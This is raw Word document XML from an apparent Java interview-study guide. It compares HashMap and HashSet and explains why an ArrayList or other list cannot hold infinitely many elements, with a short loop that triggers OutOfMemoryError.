            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">; duplicate </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>values</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70D07805" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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nique </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>values</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="2BF1AD5C" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D8F757" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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acking Data Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1395CC61" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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s a hash table for key-value pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74CE5DCE" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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s a HashMap internally with values as dummy values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="0EB4A036" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71947045" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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uplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66A3FCB4" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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duplicate keys, but values can be duplicated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C226620" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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duplicates allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="00F77E06" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4272EF24" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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ull Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E4D0268" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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llows </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one null key</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and multiple </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B6230CF" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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llows </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one null element</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="058A34E4" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31AA535E" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E4D16E9" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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need to map a unique key to a value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E74E537" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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need a collection of unique elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="19A677FE" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="221BD45D" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20AEBCD8" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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for get(), put(), and remove()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8F61C3" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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1)</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for add(), remove(), and contains()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00060EC8" w:rsidRPr="00CE4B95" w14:paraId="05EEFA47" w14:textId="77777777" w:rsidTr="00CA0BF1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2256124F" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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teration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B091BAB" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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erates over </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>key-value pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07774717" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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erates over </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>values</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C041CC2" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00060E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7A885DD">
          <v:rect id="_x0000_i1570" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D00357" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060E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to Use Each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CD14F" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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HashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B96A016" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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need to store key-value pairs, where each key maps to a specific value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C884468" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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need to look up values based on keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B53082" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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HashSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C12C631" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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you only care about the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uniqueness of elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and do not need to store key-value pairs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A0CE8" w14:textId="77777777" w:rsidR="00CA0BF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA0BF1" w:rsidP="00060EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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deal for operations like eliminating duplicates or checking membership in a set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F60EB9" w14:textId="1A137DD3"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EF78E1C">
          <v:rect id="_x0000_i1571" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02414196" w14:textId="77777777" w:rsidR="005B53CB" w:rsidRPr="00CE4B95" w:rsidRDefault="005B53CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc196307663"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we add infinite elements to ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w14:paraId="708124DA" w14:textId="797E5593" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">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theory, you </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> add an infinite number of elements to an ArrayList in Java, as the underlying data structure (an array) has a finite amount of memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FAF84" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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s why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD1938" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AD5103" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ArrayList internally uses an array to store its elements. As you add more elements, the array may need to be resized (increased in size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B09A780" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ventually, the JVM will run out of memory to allocate the necessary space for the array, and you'll encounter an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6B90F2" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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List Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A47DA4" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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the internal array reaches its capacity, ArrayList resizes itself by allocating a larger array (typically 1.5 times the current size) and copying the elements over to the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274BB5F" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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resizing continues as long as there is enough heap memory available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344E73B" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ystem Memory Limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4567935B" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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maximum number of elements you can add to an ArrayList is constrained by the available heap memory in your Java Virtual Machine (JVM). The size of the array will be limited by the JVM's maximum memory allocation, which depends on factors such as the system architecture (32-bit vs. 64-bit), JVM settings (heap size), and physical RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318CEA7E" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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actical Constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CB4DA" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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While ArrayList grows dynamically, if you try to add more elements than the available memory can accommodate, you'll hit a limit and eventually face a memory-related exception (OutOfMemoryError).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3082B0D7" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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20C6F0F0" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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rayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B15EFF2" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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ile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A2D8B3" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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1);  // Continuously adding elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960374C" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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B364A81" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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will keep adding elements until the JVM runs out of memory and throws an OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD52647" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008F62F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1B24EAD">
          <v:rect id="_x0000_i1572" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A75E4" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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1FF98EA9" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="008F62F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not add an infinite number of elements to an ArrayList. The practical limit is determined by the available memory in the system where the JVM is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE598C" w14:textId="1AFA0870"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4EE748D">
          <v:rect id="_x0000_i1573" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="236160EE" w14:textId="77777777" w:rsidR="005B53CB" w:rsidRPr="00CE4B95" w:rsidRDefault="005B53CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="_Toc196307664"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we store infinite elements in a list?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
    </w:p>
    <w:p w14:paraId="4CFE1BB3" w14:textId="336459EF" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">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No, you </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot store an infinite number of elements in a list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, regardless of the type of list (like ArrayList, LinkedList, etc.) in Java. There are several limitations that prevent storing infinite elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B796EFA" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1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Memory Constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA35B91" w14:textId="77777777" w:rsidR="00893B5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00893B5B" w:rsidP="00C34A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85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primary limitation is the amount of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>available memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Whether you're using a List or any other collection in Java, it will eventually consume all the available memory in your system (RAM) or JVM heap.</w:t>
      </w:r>
    </w:p>
